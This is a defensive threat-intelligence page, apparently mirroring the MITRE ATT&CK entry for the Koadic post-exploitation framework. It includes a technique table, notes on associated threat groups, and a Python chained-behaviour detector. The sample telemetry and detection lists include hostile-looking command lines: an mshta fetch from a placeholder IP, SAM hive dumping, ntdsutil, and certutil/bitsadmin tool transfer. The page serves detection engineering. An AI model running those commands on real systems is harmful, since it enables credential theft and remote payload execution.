S0250: Koadic
Analyst context for executives and security teams
Koadic matters because it is a publicly available Windows post-exploitation framework that can stage payloads, create implants, and operate heavily through Windows Script Host. For leaders, the risk is not the tool name itself; it is whether the organization can see and control script-driven activity after a Windows host is compromised, especially when it leads to credential access, discovery, lateral movement, collection, and command-and-control behaviors mapped by ATT&CK.
Executive priority
Prioritize Koadic as a validation case for Windows endpoint readiness, identity protection, and incident response depth. The ATT&CK relationships connect it to credential access against SAM and NTDS, RDP lateral movement, WMI, scheduled tasks, PowerShell, cmd, Visual Basic, mshta, web-based command and control, tool transfer, and local/share discovery. Executives should ask whether SOC coverage proves these behaviors are logged, triaged, and escalated quickly enough to protect domain credentials, business-critical file shares, and continuity of Windows operations.
Technical view
Koadic is described by MITRE as a Windows post-exploitation and penetration testing framework available on GitHub, with multiple staging and implant options and operations using Windows Script Host. ATT&CK does not provide a dedicated detection section, so detection engineering should be behavior-led across the related techniques: script interpreter execution, mshta abuse, PowerShell/cmd/VB activity, WMI execution, scheduled task creation, DLL injection indicators, credential access attempts against SAM/NTDS, discovery commands, RDP activity, tool transfer, clipboard access, and HTTP/S-style command-and-control patterns. Treat the named group relationships as context for threat intelligence enrichment, not as proof of current activity in any environment.
Likely telemetry
- Windows process creation and command-line logging for wscript/cscript, mshta, powershell, cmd, scheduled task utilities, and WMI-related processes
- PowerShell script block, module, and transcript logs where enabled
- Windows Script Host execution evidence and parent-child process relationships
- WMI operational logs and remote execution indicators
- Task Scheduler operational logs and new or modified scheduled task events
Detection direction
- Build detections around chained behavior rather than the tool name: script host or mshta execution followed by discovery, credential access, tool transfer, or persistence is higher value than isolated script execution.
- Validate coverage for Windows Script Host because MITRE specifically notes Koadic performs most operations using it.
- Tune PowerShell, cmd, VB, WMI, and scheduled task analytics for administrative false positives; require context such as unusual parent process, rare user/host, remote execution, encoded or scripted content, or follow-on discovery.
- Correlate credential access signals involving SAM or NTDS with preceding script execution and subsequent RDP or network share activity.
- Use web command-and-control analytics cautiously: HTTP/S alone is common, so prioritize unusual destinations, rare user agents, beacon-like patterns, or process-to-network relationships tied to script interpreters.
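Detection logic for the chained-behaviour and beaconing guidance above, as an added example; this is not Koadic code and not MITRE content. It assumes Sysmon-like event fields (`ts`, `host`, `pid`, `ppid`, `image`, `cmdline`, `dest`), the command-line substrings are generic indicators for each technique class rather than Koadic's own commands, and every sample event is constructed.

```python
# Added example for this page (not Koadic code, not MITRE content): chained-behaviour
# analytics over Sysmon-like telemetry. Field names (ts, host, pid, ppid, image, cmdline,
# dest) are an assumption; every sample event below is constructed.
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

# Script hosts and LOLBins the ATT&CK relationships on this page tie to Koadic.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Follow-on behaviour classes from the technique table, keyed to illustrative command-line
# substrings. These are generic indicators for each technique class (an assumption of this
# example), not Koadic's literal commands; tune them to your own baselines.
FOLLOW_ON = {
    "discovery": ("route print", "ipconfig", "net view", "query user", "qwinsta", "whoami"),
    "credential_access": ("reg save hklm\\sam", "reg save hklm\\security", "ntdsutil",
                          "vssadmin create shadow"),
    "persistence": ("schtasks /create", "currentversion\\run"),
    "tool_transfer": ("bitsadmin /transfer", "certutil -urlcache", "downloadfile("),
}

def classify(cmdline):
    """Return the follow-on behaviour classes a command line matches (possibly empty)."""
    low = cmdline.lower()
    return {cat for cat, needles in FOLLOW_ON.items() if any(n in low for n in needles)}

def detect_chains(events, window=timedelta(minutes=30)):
    """Alert on a script-host process whose descendants (pid/ppid on the same host, so cmd.exe
    children of mshta.exe count) perform credential access or two distinct follow-on classes."""
    alerts = []
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host[e["host"]].append(e)
    for host, evs in by_host.items():
        for i, root in enumerate(evs):
            if root["image"].lower() not in SCRIPT_HOSTS:
                continue
            tainted = {root["pid"]}          # root pid plus every descendant seen so far
            cats, cmds = set(), []
            for e in evs[i + 1:]:
                if e["ts"] - root["ts"] > window:
                    break
                if e["ppid"] in tainted:
                    tainted.add(e["pid"])
                    hit = classify(e["cmdline"])
                    if hit:
                        cats |= hit
                        cmds.append(e["cmdline"])
            if "credential_access" in cats or len(cats) >= 2:
                alerts.append({"host": host, "root": root["cmdline"],
                               "categories": sorted(cats), "commands": cmds})
    return alerts

def beacon_candidates(net_events, min_connections=4, max_cv=0.2):
    """Flag outbound connections from script hosts whose inter-connection intervals are nearly
    constant (coefficient of variation <= max_cv). HTTP/S alone is common; regularity is not."""
    series = defaultdict(list)
    for e in net_events:
        if e["image"].lower() in SCRIPT_HOSTS:
            series[(e["host"], e["image"], e["dest"])].append(e["ts"])
    flagged = []
    for (host, image, dest), stamps in series.items():
        stamps.sort()
        if len(stamps) < min_connections:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        cv = pstdev(gaps) / mean(gaps) if mean(gaps) > 0 else 0.0
        if cv <= max_cv:
            flagged.append({"host": host, "image": image, "dest": dest,
                            "mean_interval_s": round(mean(gaps), 1), "cv": round(cv, 3)})
    return flagged

# Constructed sample telemetry; 203.0.113.10 is a documentation-range (TEST-NET-3) address.
T0 = datetime(2024, 1, 15, 9, 0, 0)

def _proc(sec, host, pid, ppid, image, cmdline):
    return {"ts": T0 + timedelta(seconds=sec), "host": host, "pid": pid, "ppid": ppid,
            "image": image, "cmdline": cmdline}

SAMPLE_PROCESS_EVENTS = [
    _proc(0, "WS-07", 4100, 3000, "mshta.exe", "mshta.exe http://203.0.113.10/p"),
    _proc(5, "WS-07", 4120, 4100, "cmd.exe", "cmd.exe /c route print"),
    _proc(20, "WS-07", 4130, 4100, "cmd.exe", "cmd.exe /c query user"),
    _proc(180, "WS-07", 4150, 4100, "cmd.exe", "cmd.exe /c reg save HKLM\\SAM C:\\Windows\\Temp\\sam.hiv"),
    _proc(0, "WS-12", 900, 800, "cmd.exe", "cmd.exe /c ipconfig /all"),            # admin, no script-host parent
    _proc(0, "WS-12", 950, 700, "wscript.exe", "wscript.exe \\\\dc1\\netlogon\\map.vbs"),  # logon script, no follow-on
]
SAMPLE_NETWORK_EVENTS = (
    [{"ts": T0 + timedelta(seconds=30 * i), "host": "WS-07", "image": "mshta.exe",
      "dest": "203.0.113.10:80"} for i in range(6)]                                    # 30 s cadence, no jitter
    + [{"ts": T0 + timedelta(seconds=s), "host": "WS-12", "image": "wscript.exe",
        "dest": "dc1:445"} for s in (0, 7, 65, 66, 300)]                                # irregular, benign
)

if __name__ == "__main__":
    print(detect_chains(SAMPLE_PROCESS_EVENTS), beacon_candidates(SAMPLE_NETWORK_EVENTS))
```

On the constructed data only the WS-07 mshta chain alerts (discovery plus credential access under one script-host ancestor), and only the fixed 30-second mshta series is flagged as beacon-like; the admin's interactive `ipconfig` and the logon script on WS-12 produce nothing, which is the false-positive behaviour the tuning bullet above asks for. The thresholds (30-minute window, two behaviour classes, CV at or below 0.2) are starting points, and pid-based descent tracking does not survive pid reuse or chains that cross hosts, so a production version should key on process GUIDs and correlate RDP or share activity separately.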
Mitigation priorities
- Harden and monitor Windows Script Host, mshta, PowerShell, WMI, scheduled tasks, and command shell usage according to business need and administrative workflows.
- Reduce credential exposure by protecting domain controllers, restricting access to SAM/NTDS-related material, and monitoring privileged account use.
- Limit lateral movement paths by controlling RDP access, enforcing least privilege, and reviewing where valid accounts can initiate remote sessions.
- Restrict unnecessary script execution and tool transfer from untrusted locations while preserving approved administration use cases.
- Ensure incident response playbooks include rapid scoping for discovery, credential access, persistence through scheduled tasks, and movement to file shares or domain controllers.
Analyst notes and limits
The relationship set is useful because it shows Koadic can be associated with a broad post-exploitation sequence: execution through Windows scripting and command interpreters, discovery, credential access, lateral movement, collection, persistence, and command-and-control. Group relationships include APT28, MuddyWater, Sidewinder, and LazyScripter, but this should be used for intelligence context only unless local evidence supports attribution.
ATT&CK provides no official detection text for this object and no tactics are specified directly on the tool record. The object platform is Windows, so environment-specific validation is required for Windows logging, endpoint controls, and administrative baselines. This take does not infer active exploitation, customer exposure, or guaranteed detection coverage.
Koadic
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1016 | System Network Configuration Discovery | Koadic can retrieve the contents of the IP routing table as well as information about the Windows domain. (Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1082 | System Information Discovery | Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode. (Citation: Github Koadic) |
| Enterprise | T1218.005 | Mshta Sub-technique | Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence. (Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1055.001 | Dynamic-link Library Injection Sub-technique | Koadic can perform process injection by using a reflective DLL. (Citation: Github Koadic) |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | Koadic can use Regsvr32 to execute additional payloads. (Citation: Github Koadic) |
| Enterprise | T1033 | System Owner/User Discovery | Koadic can identify logged in users across the domain and view user sessions. (Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1564.003 | Hidden Window Sub-technique | Koadic has used the command |
| Enterprise | T1003.002 | Security Account Manager Sub-technique | Koadic can gather hashed passwords by dumping the SAM/SECURITY hives. (Citation: Github Koadic) |
| Enterprise | T1105 | Ingress Tool Transfer | Koadic can download additional files and tools. (Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Koadic has used HTTP for C2 communications. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1047 | Windows Management Instrumentation | Koadic can use WMI to execute commands. (Citation: Github Koadic) |
| Enterprise | T1059.001 | PowerShell Sub-technique | Koadic has used PowerShell to establish persistence. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1115 | Clipboard Data | Koadic can retrieve the current content of the user clipboard. (Citation: Github Koadic) |
| Enterprise | T1548.002 | Bypass User Account Control Sub-technique | Koadic has two methods for elevating integrity. It can bypass UAC through `eventvwr.exe` and `sdclt.exe`. (Citation: Github Koadic) |
| Enterprise | T1046 | Network Service Discovery | Koadic can scan for open TCP ports on the target network. (Citation: Github Koadic) |
| Enterprise | T1021.001 | Remote Desktop Protocol Sub-technique | Koadic can enable remote desktop on the victim's machine. (Citation: Github Koadic) |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | |
| Enterprise | T1083 | File and Directory Discovery | Koadic can obtain a list of directories. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Koadic has added persistence to the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` Registry key. (Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1003.003 | NTDS Sub-technique | Koadic can gather hashed passwords by gathering domain controller hashes from NTDS. (Citation: Github Koadic) |
| Enterprise | T1569.002 | Service Execution Sub-technique | |
| Enterprise | T1005 | Data from Local System | Koadic can download files off the target system to send back to the server. (Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021) |
| Enterprise | T1573.002 | Asymmetric Cryptography Sub-technique | Koadic can use SSL and TLS for communications. (Citation: Github Koadic) |
| Enterprise | T1135 | Network Share Discovery | Koadic can scan the local network for open SMB. (Citation: Github Koadic) |
| Enterprise | T1218.011 | Rundll32 Sub-technique | Koadic can use Rundll32 to execute additional payloads. (Citation: Github Koadic) |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Koadic has used scheduled tasks to add persistence. (Citation: MalwareBytes LazyScripter Feb 2021) |
Groups, software, and campaigns
G0007: APT28
APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.[1][2] This group has been active since at least 2004.[3][4][5][6][7][8][9][10][11][12][13]
APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.[5] In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.[14] Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.
G0140: LazyScripter
LazyScripter is a threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.[1]
G0121: Sidewinder
Sidewinder is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.[1][2][3]
G0069: MuddyWater
MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. MuddyWater has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, MuddyWater used commercial satellite internet (i.e., Starlink) for command and control (C2) communication.[2][3][4][5][6][7][8][9][10][11][12][13]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 2.0 | | Current bundle | 17f5b1145049… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Github Koadic: Magius, J., et al. (2017, July 19). Koadic. Retrieved September 27, 2024.
- [2] Palo Alto Sofacy 06-2018: Lee, B., Falcone, R. (2018, June 06). Sofacy Group's Parallel Attacks. Retrieved June 18, 2018.
- [3] MalwareBytes LazyScripter Feb 2021: Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.
- [4] Koadic (alias entry): (Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)
- [5] mitre-attack: S0250
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.